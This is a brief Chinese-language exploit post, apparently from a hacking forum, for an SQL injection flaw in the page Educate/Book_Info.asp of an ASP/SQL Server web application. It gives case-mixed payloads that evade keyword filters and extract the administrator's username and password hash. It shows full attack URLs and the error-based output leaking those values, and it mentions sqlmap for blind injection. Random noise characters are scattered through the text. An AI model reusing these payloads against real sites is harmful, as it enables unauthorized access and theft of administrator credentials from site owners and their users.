漏洞出现在Educate/Book_Info.asp
- B$ T5 h! @5 E m1 ]' [$ E( v
# d/ F( B O/ o此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
( ]5 D* F. w0 U( k( Z
- f$ b. L1 q( y& W7 Uexp:如下; |+ b8 {" p7 ^( P O! c1 V5 M
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)5 ` |; _& c7 N9 P$ _' A! r; R
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; b. L# Y; L# k/ n! { & x. f+ @6 M; k% j% A
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ N0 R) D7 z, M4 R/ X' H
5 q4 A; B/ B9 v5 N6 W9 iMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
5 w6 v8 R0 Q; A+ Q 7 I0 r# ?' p- L; T- C4 {8 I2 g- e
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
+ F- l* f* V( s2 t) C( R * V3 l2 m0 Y' a: P' v* ], g4 @
/Educate/Book_Info.asp,行 8
2 M* H& E3 O% A3 _) G6 J, X( n
8 c! m# L7 Y0 z3 @6 Z' |http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
' {$ g0 a; I0 X9 G) P% J , x+ ~% _4 N$ k9 \9 X' R
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'8 X4 U) ^# V: [; i% u
/ o1 R2 t, L3 D- j; N1 r将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。) j+ j% l% x) c7 y" {, \+ {
' W0 a- Z s6 B+ Q) ]/Educate/Book_Info.asp,行 8
% ^; z/ i9 v5 F |